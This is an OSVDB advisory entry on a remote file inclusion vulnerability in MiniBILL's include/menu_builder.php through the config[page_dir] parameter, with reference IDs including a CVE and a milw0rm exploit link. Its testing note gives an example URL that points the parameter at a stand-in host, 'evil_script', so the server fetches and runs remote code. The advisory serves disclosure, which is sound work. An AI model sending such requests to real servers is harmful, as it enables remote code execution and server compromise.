MiniBILL include/menu_builder.php config[page_dir] Variable Remote File Inclusion

2006-10-27T07:18:55
ID OSVDB:30098
Type osvdb
Reporter OSVDB
Modified 2006-10-27T07:18:55

Description

Manual Testing Notes

http://[target]/[script_path]/include/menu_builder.php?config[page_dir]=http://evil_script?

References:

Vendor URL: http://www.ultrize.com/minibill/index.php
Secunia Advisory ID: 22632
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0432.html
ISS X-Force ID: 29834
Generic Exploit URL: http://www.milw0rm.com/exploits/2656
FrSIRT Advisory: ADV-2006-4249
CVE-2006-5620
Bugtraq ID: 20766